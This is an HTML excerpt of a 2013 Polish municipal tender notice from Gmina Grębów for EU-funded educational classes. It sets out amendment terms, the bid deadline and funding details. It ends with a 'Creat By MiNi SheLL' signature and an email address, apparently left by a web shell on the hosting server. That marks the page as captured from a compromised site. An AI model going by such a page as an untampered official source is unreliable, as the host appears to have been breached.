</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwość dokonania następujących zmian w umowie:
1.	Zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy, w przypadku wystąpienia okoliczności niezależnych od Wykonawcy i Zamawiającego skutkujących niemożliwością dotrzymania terminu realizacji przedmiotu umowy.
2. Zmiana osób, które będą uczestniczyć w wykonaniu zamówienia w szczególności w przypadku choroby osoby, która będzie prowadziła zajęcia lub innych zdarzeń losowych uniemożliwiających prowadzenie zajęć. W przypadku zmiany osoby, prowadzącej zajęcia, nowa osoba, która będzie prowadzić zajęcia musi spełniać wymagania określone w pkt 7.2 SIWZ. Zmiany umowy mogą zostać dokonane wyłącznie w przypadku Wykonawcy, który prowadzi działalność gospodarcza pod warunkiem przedłożenia Zamawiającemu pisemnego uzasadnienia konieczności wprowadzenia zmiany, przedłożenia dokumentów potwierdzających kwalifikacje osoby, która będzie prowadziła zajęcia oraz wyrażenia zgody Zamawiającego na tę zmianę. W przypadku Wykonawcy, który jest osobą fizyczną nie prowadzącą działalności gospodarczej na skutek zaistnienia okoliczności uniemożliwiających prowadzenie zajęć np. choroba umowa ulega rozwiązaniu, a w przypadku śmierci wygasa.
3. W przypadku wystąpienia niezależnych od Zamawiającego, niemożliwych do przewidzenia w trakcie zawierania umowy okoliczności takich jak np. klęski żywiołowe, znacząca absencja chorobowa dzieci, itp. Zamawiający ma prawo do zmniejszenia zakresu realizacji przedmiotu umowy do aktualnie niezbędnych swoich potrzeb lub zawieszenia świadczenia usług, na okres, w którym okoliczności te występują.
4.	Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.
5.	Zmiana nazw, siedziby stron umowy, numerów kont bankowych, innych danych identyfikacyjnych.
6.	Zmniejszenie zakresu usług i wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany 	okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, 	czego nie można było przewidzieć w chwili jej zawarcia.
7.	Zmiana harmonogramu realizacji projektu w przypadku zaistnienia zmian wytycznych, zmian warunków realizacji projektu lub treści dokumentów programowych oraz zmian organizacyjnych w pracy szkoły.
8.	W przypadku wystąpienia okoliczności stanowiących podstawę do zmian postanowień umowy Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie zmian w przedmiotowej umowie.
9.	W przypadku wystąpienia okoliczności stanowiących podstawę do zmian postanowień umowy Zamawiający zobowiązany jest do niezwłocznego poinformowania na piśmie o tym fakcie Wykonawcy i  wystąpienia z wnioskiem o dokonanie zmian w przedmiotowej umowie.
10.	Jeżeli Zamawiający uzna, że okoliczności wskazane przez Wykonawcę, jako stanowiące podstawę do zmiany umowy nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodnie z warunkami zawartymi w umowie. Zmiana umowy może nastąpić w formie pisemnej, pod rygorem nieważności takiego oświadczenia.
11.	Powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www..grebow.un.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Grębów 39-410 Grębów 394.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2013 godzina 11:00, miejsce: Urząd Gminy Grębów 39-410 Grębów 394 pok. nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt wspólfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,Priorytet IX Rozwój Wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com